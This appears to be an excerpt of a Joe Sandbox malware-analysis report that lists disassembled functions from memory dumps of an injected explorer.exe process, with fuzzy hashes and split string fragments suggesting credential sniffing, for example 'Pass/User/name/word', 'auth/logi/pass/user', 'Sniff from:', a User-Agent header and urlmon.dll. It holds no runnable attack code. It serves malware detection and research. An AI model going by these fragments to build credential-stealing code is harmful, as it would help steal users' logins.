Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 3015d7ed2b5c49eb83456f85d970873248879d9097a4f65058c5b02cebedbd5a
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 46917070A187488BDB19EFA8D444BEEB7F1FB98300F40462DD48AD7251EB749945C789

Function 0E3F7CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

L: , xrefs: 0E3F7D66
UR, xrefs: 0E3F7D5F
name, xrefs: 0E3F7DB2
User, xrefs: 0E3F7DAB
2, xrefs: 0E3F7DE1
Pass, xrefs: 0E3F7D97
word, xrefs: 0E3F7D9E

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 57d89a4adbe682489b16656aab2c14310e97ed3c5153a87cc31224f6ab5e40a2
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: C0918F70618748CBDB29EFA8D444BEEBBE1FF98300F40462ED58AD7251EF7099458785

Function 0E072352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 0E07247C
., xrefs: 0E0723B0
e, xrefs: 0E07248E
n, xrefs: 0E0723E7
v, xrefs: 0E0724A0

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 8d91910c77cd9bc21d638bc5060ba71a326ecb5c76a42a7cd56090a5e4394d0a
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: C3716371A18B488FD759EFA8C4887EAB7F1FF98304F00062ED48AC7261EB719D458785

Function 0E3F7352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 0E3F747C
., xrefs: 0E3F73B0
v, xrefs: 0E3F74A0
n, xrefs: 0E3F73E7
e, xrefs: 0E3F748E

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: ac8b0f2c3229da6d96beecbe53ff4c17948f8fc42ffdcbbf42bdbe52ea869474
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 42715131618649CFD758EF68C4847AABBF1FF98305F000A2FD54AC7261EB71D9458B85

Function 0E06DC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 0E06DC97
2.dl, xrefs: 0E06DC64
dll, xrefs: 0E06DC9E
shel, xrefs: 0E06DC90
ole3, xrefs: 0E06DC5D

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 9cf11512af593e514baf46e9848c11c20b30bb52c75a7efbae996e494595896e
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6D514EB0918B4C8FDB55EFA4C0456EEB7F1FF58300F404A2E959AE7214EF7099418B9A

Function 0E3F2C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 0E3F2C97
ole3, xrefs: 0E3F2C5D
shel, xrefs: 0E3F2C90
dll, xrefs: 0E3F2C9E
2.dl, xrefs: 0E3F2C64

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: e3da1ae188870d7c0d2868698640feb4b539a045bd0a3dedcf90fcd92dfc8432
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: FB512CB0918B4CCFDB54EFA4C045AEAB7E1FF58300F404A2ED59AE7254EF7095458B89

Function 0E06E86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0E06E8F4
vers, xrefs: 0E06E8E4
ion., xrefs: 0E06E8EC
4, xrefs: 0E06E9E9
\, xrefs: 0E06E9E0

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: a1880f75ff3832d29ef846e776d1bad27d86cca54620cb70464f6b3188971059
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 49416234618B888FDBA5EF64D8557EB77E5FB98301F41462E988EC7240EF30DA458782

Function 0E3F386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0E3F38F4
ion., xrefs: 0E3F38EC
\, xrefs: 0E3F39E0
4, xrefs: 0E3F39E9
vers, xrefs: 0E3F38E4

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 983ad640f5b1f0b76e67d009956fec4c48c5e9e5ef1a88df01610346c861e4d0
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: F4415E30218B888FCB65EF6598557EAB7E4FF99301F40462ED99EC7240EF30D9458B82

Function 0E0704B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

dll, xrefs: 0E07051C
user, xrefs: 0E0704D3
cli., xrefs: 0E070515
sspi, xrefs: 0E07050E
32.d, xrefs: 0E0704DA

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 64f02675bf55c1f08eb150861915bef5b413d62d59f66d4864e094d87dd09bd0
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 91416230E28E0D8FCB98EF58D0947EE77E1FB58340F50466A988ED7210DA75D9408BCA

Function 0E3F54B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0E3F5515
dll, xrefs: 0E3F551C
32.d, xrefs: 0E3F54DA
user, xrefs: 0E3F54D3
sspi, xrefs: 0E3F550E

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 0ebd7551a9ac85c928ff6a00086f4f9f98a16382fe32ce2fc8444c3dfbc393f4
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: AA413970A18E0DDFCB94EF68C0946AD7BF2FB58301F50456AE90ED7210DA70DD408B86

Function 0E06E432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 0E06E51F
kern, xrefs: 0E06E52A
.dll, xrefs: 0E06E53F
el32, xrefs: 0E06E537

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 1747246e24be61312c2885b8b5c5c9ad4b1984d592f1435eb0a851200b45dbc8
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 66418370608B4C8FD7A9DF28C4943AAB7E1FB98345F144A2E949EC3255EB70C946CB42

Function 0E3F3432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 0E3F3537
kern, xrefs: 0E3F352A
.dll, xrefs: 0E3F353F
h, xrefs: 0E3F351F

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: f0c3dc082db0c5fb219c9dcc292c4f7bb6eaefddedc73320791507f228bab710
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F3418070608B498FD769DF2984883AAFBE1FB98301F504A6FD59EC3265DB70C945CB81

Function 0E0750B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 0E075184
Snif, xrefs: 0E075154
om:, xrefs: 0E075146
f fr, xrefs: 0E07513D

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 940ebd57930886f96e882ee143d9164a5384c1f972aaedfefe82a3e4aabdf3af
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 5331B071909B885FD71AEB28C4846DAB7D4FB94300F504D1EE4DBC7291EA31A94ACB47

Function 0E3FA0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 0E3FA184
om:, xrefs: 0E3FA146
f fr, xrefs: 0E3FA13D
Snif, xrefs: 0E3FA154

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 4fa99629715940619ca7b1f99042bd49fac87becade9e20e4eacc46db5a35ec3
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 0831C57151CB88AFD71AEB28C4846DABBD4FB94300F504D1EE59BC7252EE70A949CB43

Function 0E0750C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 0E075184
Snif, xrefs: 0E075154
om:, xrefs: 0E075146
f fr, xrefs: 0E07513D

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: b3a09c0cfecdcef14121dc5da76fc103ea449c0c5d8501878618c50abb9ee543
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: A531C271909B486FD71AEB28C4846EAB7D5FB94300F504D1EE4DBC7291EE30A906CB47

Function 0E3FA0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 0E3FA184
om:, xrefs: 0E3FA146
f fr, xrefs: 0E3FA13D
Snif, xrefs: 0E3FA154

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 7876890e358d6e5d617409128d77fdb91f7463b2caf3887d3d86c43961e02ccc
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 8531B271518B48AFD719EB28C484AEABBD4FB94300F504D1EE5ABC7251EE70E946CA43

Function 0E070FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 0E070FF6
me_c, xrefs: 0E070FEE
.dll, xrefs: 0E070FFE
chro, xrefs: 0E071023

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 55c4abc835346980ba2a5b3b647003c108965f959d42b0b761375cccbae434fb
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: E8317070618B484FC794EF688494BAAB7E1FBD8200F944A2D948EC7254DF30C945C796

Function 0E3F5FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 0E3F5FEE
chro, xrefs: 0E3F6023
.dll, xrefs: 0E3F5FFE
hild, xrefs: 0E3F5FF6

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: c9434dace90731edef2e1b39fc5739f6dc27c5fb6719430d926878a1e26001fc
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 07314F70218B18CFCB84EF688495BAABBE1FBD4200F94496DD94EC7255DF30C9458792

Function 0E070FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 0E070FF6
me_c, xrefs: 0E070FEE
.dll, xrefs: 0E070FFE
chro, xrefs: 0E071023

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 158c2f87866dff105e5518273d3f4fdcbc395e0bda6682874ff6773bf097112e
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 0F316D70618B488FC794EF688494BEAB7E1FFD8300F944A2D948ACB254DF30C945C79A

Function 0E3F5FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 0E3F5FEE
chro, xrefs: 0E3F6023
.dll, xrefs: 0E3F5FFE
hild, xrefs: 0E3F5FF6

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 76db67663e8ba7aafa5165a10703766722e2b64d8083b33882d4103afc08b5e2
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 03313070218B18CFC794EF688495BAABBE1FBD4300F944A6DD94AC7255DF30C9458752

Function 0E0738C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E07391E
on.d, xrefs: 0E073902
User-Agent: , xrefs: 0E073935, 0E073948
urlmon.dll, xrefs: 0E073959

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 2c25df41714c09932a796a485d509d3f2a96f70a05ed5a8b7bb05c296e37b721
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 7F31D171A14A0C8BCB45EFA8C8847EEB7E1FB58204F40462AD58ED7240DF788A45C789

Function 0E3F88C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E3F891E
urlmon.dll, xrefs: 0E3F8959
on.d, xrefs: 0E3F8902
User-Agent: , xrefs: 0E3F8935, 0E3F8948

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 32b5953b0ddf92a248774779df3c97f7af0b382fd77c432132b4b9126c0f56fe
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 3631B131614A0D8FCB44EFA8C8847EEBBE1FB58214F40462AD95ED7250DE748A45C789

Function 0E0738BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E07391E
on.d, xrefs: 0E073902
User-Agent: , xrefs: 0E073935, 0E073948
urlmon.dll, xrefs: 0E073959

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 0ae8618ba7ac5ec7e5f7bd29a1edfd26b579b326cd45f78002fb9c657fa4ca94
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 6521D270A14A4C8BCB45EFA8C8847EEBBF5FF58204F40462AD49AD7240DF788E45C789

Function 0E3F88BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E3F891E
urlmon.dll, xrefs: 0E3F8959
on.d, xrefs: 0E3F8902
User-Agent: , xrefs: 0E3F8935, 0E3F8948

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: a9c764e8977cb4c274f549584f1f424d17c1433abe332ed697fbca77ab6bbaf0
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 9E21D270610A0D8FCB04EFA8C8847EEBFE0FF58204F40462AE95AD7250DF748A05C789

Function 0E074E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E074F03
l, xrefs: 0E074F26
., xrefs: 0E074F1F
t, xrefs: 0E074EF4

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 94e15e7ae3e6f3db04fa1a36182a545600797e6fbb3916cbd5f0b9fa0373f8c9
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: CE216B70A24A0D9BDB48EFA8D0447EEBBF1FB58314F504A2ED089D3600DB7499518B88

Function 0E074E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E074F03
l, xrefs: 0E074F26
., xrefs: 0E074F1F
t, xrefs: 0E074EF4

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: c737c7d148a0a4bd1c2de21028cc4462902aab945dffbcd13287327655193281
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 5E215A70A24A0D9BDB48EFA8D0447EEBAF1FB58314F504A2ED089D3610DB7499918B88

Function 0E3F9E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E3F9F26
., xrefs: 0E3F9F1F
t, xrefs: 0E3F9EF4
l, xrefs: 0E3F9F03

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 46df915e9f697e333fd3874cf41fbc55d73d5336e836fe2741d47018b6f550cb
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: F7216B70A24A0EDBDB08EFA8D044BEEBBF1FF58314F504A2ED509D3610DB7999518B84

Function 0E3F9E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E3F9F26
., xrefs: 0E3F9F1F
t, xrefs: 0E3F9EF4
l, xrefs: 0E3F9F03

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 9a7cc08c1b0e0e620fac3dddc83d21e0ac6eca86c4c4f40baedfc4bfa468f07a
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 83215C70A24A0EDBDB48EFA8D0447AEBAF1FF58314F504A2ED509D3610DB7999518B84

Function 0E074FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 0E075022
logi, xrefs: 0E07503C
auth, xrefs: 0E07502F
user, xrefs: 0E075015

Memory Dump Source

Source File: 0000000A.00000002.2433390421.000000000DFB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dfb0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 1666edfea49cf7605906f5222271b3d162119ed769686e9d3d44531383af9ed7
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 8B21AE30B14B0D8BCB45DF9D98906EEB7F1EF88344F004619944ADB245D7B1DD158BC6

Function 0E3F9FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0E3FA02F
user, xrefs: 0E3FA015
pass, xrefs: 0E3FA022
logi, xrefs: 0E3FA03C

Memory Dump Source

Source File: 0000000A.00000002.2433563442.000000000E3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e3d0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
